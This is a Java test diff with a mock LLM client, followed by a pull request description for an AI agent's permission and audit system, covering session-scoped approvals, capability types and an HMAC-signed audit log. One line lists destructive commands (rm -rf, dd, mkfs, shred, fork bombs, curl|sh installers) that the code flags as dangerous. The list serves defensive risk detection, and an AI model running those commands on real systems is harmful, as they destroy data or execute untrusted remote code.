+        skillTool.setCurrentSessionId("session-A");
+
+        skillTool.execute("""
+                {"name":"review-and-write"}
+                """);
+
+        assertThat(capturedSessionIds)
+                .as("forked skill's sub-agent must see the parent's session id, not null")
+                .containsExactly("session-A");
+    }
+
+    /**
+     * Mock LLM that emits one {@code write_file} tool_use on the first call
+     * and an end-of-turn text on the second. Same shape as the one inside
+     * {@code SubAgentRunnerTest}; duplicated here because that one is
+     * package-private to its test class.
+     */
+    private static final class ToolUseOnceMockLlm implements LlmClient {
+        private boolean firstCall = true;
+
+        @Override public LlmResponse sendMessage(LlmRequest request) {
+            throw new UnsupportedOperationException();
+        }
+
+        @Override public StreamSession streamMessage(LlmRequest request) {
+            return new StreamSession() {
+                @Override public void onEvent(StreamEventHandler handler) {
+                    handler.onMessageStart(new StreamEvent.MessageStart("msg", "mock"));
+                    if (firstCall) {
+                        firstCall = false;
+                        var toolUse = new ContentBlock.ToolUse("tu_1", "write_file", "{}");
+                        handler.onContentBlockStart(new StreamEvent.ContentBlockStart(0, toolUse));
+                        handler.onContentBlockStop(new StreamEvent.ContentBlockStop(0));
+                        handler.onMessageDelta(new StreamEvent.MessageDelta(
+                                StopReason.TOOL_USE, new Usage(10, 5)));
+                    } else {
+                        handler.onContentBlockStart(new StreamEvent.ContentBlockStart(0,
+                                new ContentBlock.Text("")));
+                        handler.onTextDelta(new StreamEvent.TextDelta("done"));
+                        handler.onContentBlockStop(new StreamEvent.ContentBlockStop(0));
+                        handler.onMessageDelta(new StreamEvent.MessageDelta(
+                                StopReason.END_TURN, new Usage(5, 2)));
+                    }
+                    handler.onComplete(new StreamEvent.StreamComplete());
+                }
+                @Override public void cancel() {}
+            };
+        }
+
+        @Override public String provider() { return "mock"; }
+        @Override public String defaultModel() { return "mock-model"; }
     }
 
     @Test


### PR DESCRIPTION
Closes #480 (final). Fixes #457.

## Summary

- Migrated 14 of 15 remaining built-in tools to `CapabilityAware` so the dispatcher's structured path covers virtually all runtime tool calls. `TaskOutputTool` intentionally stays on the legacy path (it's a passthrough poller over already-authorised work; minting a `TaskRead` variant for it would not pay for itself).
- Added five new `Capability` variants: `FileSearch(root, pattern, SearchKind)`, `ScreenCapture(reason)`, `BrowserAction(action, Optional<URI>)`, `OsScript(language, source)`, `SkillInvoke(skillName)`. `Capability.BashExec.risk()` self-escalates `EXECUTE → DANGEROUS` for `rm -rf` (incl. BSD `-Rf`), `sudo rm`, `dd`, `mkfs`, `shred`, fork bombs, `git push --force`, `git reset --hard`, and `curl|sh` installers — escalation lives in the variant so every surface (audit, dashboard, prompt) agrees without re-implementing detection.
- Audit log bumped from v1 (`toolName, level`) to v2 (full `Capability` + `Provenance` JSON, with HMAC over a canonical-sorted serialisation). v1 entries on disk continue to verify forever — the read path dispatches per-line on `schemaVersion` and v1's `signablePayload` is preserved bit-for-bit. Tamper-evidence pinned by `v2EntryHmacChangesIfCapabilityFieldsChange`; backward-compat read of mixed-version files pinned by `mixedV1AndV2EntriesInSameFileBothVerify`.
- `StreamingAgentHandler` now generates a `PromptId` per `agent.prompt` turn and threads it (plus the existing `currentStepId` from the plan-step lifecycle) into `Provenance` for every tool's permission check. The `Provenance.rootPrompt` / `planStepId` `Optional` fields stop being empty for the main loop; chain wiring is left as a follow-up since it's a separate refactor.
- **#457**: `ToolPermissionChecker.check` gains a `sessionId` parameter; `SubAgentPermissionChecker` takes a `BiPredicate<sessionId, toolName>` and is wired to `permissionManager::hasSessionApproval` instead of the permissive `hasAnySessionApproval` shim. Pre-fix, a sub-agent in workspace B silently inherited "remember" approvals granted in workspace A; post-fix it denies if its own session has no entry. Boot/cron checkers updated for the 3-arg signature (both ignore `sessionId` by design — no user session in those contexts).

## What this unblocks

PolicyEngine (#465 Scope #2) can now consume structured `Capability` from the dispatcher in the common case rather than forever falling back to `LegacyToolUse`. The audit log carries enough structured data that future timeline tooling does not need to parse human prompt strings.

## Migration safety

- v1 audit entries on disk verify after the schema bump (pinned).
- "Always allow X" approvals granted before #480 still auto-approve through the migrated tools because the dispatcher uses the originating tool's name as the allowlist key (preserved from PR 2).
- Existing `permissionChecker((name, input) -> ...)` lambdas continue to compile through the deprecated 2-arg default; new call sites must use the 3-arg form.

## Test plan

- [x] `:aceclaw-security:test` — all green, including new audit-v2 round-trip tests, BashExec destructive/non-destructive sentinels, and exhaustiveness coverage for all 5 new variants.
- [x] `:aceclaw-tools:test`, `:aceclaw-core:test`, `:aceclaw-daemon:test` — green, except `AceClawConfigTest.webSocketGatedOffForNonLoopbackHostWithoutExplicitEnable` which is pre-existing and unrelated (verified by running it against a stashed clean tip).
- [x] Multi-session matrix pinned in the rewritten `SubAgentPermissionCheckerTest`: a `write_file` approval recorded under session A must deny when checked under sessions B and C.
- [x] Mixed v1+v2 audit lines in the same file all verify under one signing key.

## Out of scope (follow-ups)

- `Provenance.chain` wiring (`PlanStepEntered` / `SubAgentSpawned` / `RetryAttempt` links) — separate refactor.
- `TaskOutputTool` migration — see summary above.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Session-scoped permission approvals to isolate approvals per session.
  * Richer capability model (new action types, file search modes, and structured tool capabilities).
  * Per-request provenance and structured audit (v2) for clearer, tamper-evident audit trails.
  * Many tools now emit structured capability metadata for policy evaluation.

* **Bug Fixes**
  * Fixed cross-session permission leakage (approvals no longer apply across different sessions).
<!-- end of auto-generated comment: release notes by coderabbit.ai -->